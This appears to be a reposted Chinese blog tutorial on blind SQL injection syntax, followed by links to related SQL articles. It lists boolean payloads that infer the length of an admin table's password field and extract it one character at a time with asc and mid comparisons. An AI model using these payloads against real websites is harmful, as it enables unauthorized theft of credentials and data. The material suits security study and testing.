本文摘自PHP中文网,作者藏色散人,侵删。
如果页面没有显错数字,则用盲注语法根据页面变化来判断数据内容获取数据长度:
1 2 3 | and (select top 1 len(列名) from 表名)>5
and (select top 1 len(password) from admin)>16
and (select top 1 len(password) from admin)>15
|
获取指定位数的数据:
1 2 3 | and (select top 1 asc(mid(列名,位置,1)) from 表名)>97
and (select top 1 asc(mid(admin,1,1)) from admin)>96
and (select top 1 asc(mid(admin,1,1)) from admin)>97
|
1 2 | mid(字符串,截取的位置,截取字符数)
asc()
|
推荐:《mysql视频教程》
以上就是关于sql盲注语法的详细内容,更多文章请关注木庄网络博客!
相关阅读 >>
实例讲解mysql 慢查询
sql数据库日志已满解决方法
oracle与sql server在企业应用的比较
mysql 字段as详解及实例代码
sql server高并发生成唯一订单号
mssql2005 insert,update,delete 之output子句使用实例
android学习笔记-保存数据到sql数据库中(saving data in sql databases)
oracle实现动态sql的拼装要领
sql server优化50法汇总
mysql的常用命令集锦
更多相关阅读请进入《sql》频道 >>
机械工业出版社
本书主要讲述了数据模型、基于对象的数据库和XML、数据存储和查询、事务管理、体系结构等方面的内容。
转载请注明出处:木庄网络博客 » 关于sql盲注语法
